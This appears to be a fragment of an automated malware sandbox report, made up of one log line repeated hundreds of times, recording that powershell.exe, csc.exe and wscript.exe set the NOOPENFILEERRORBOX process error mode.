                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
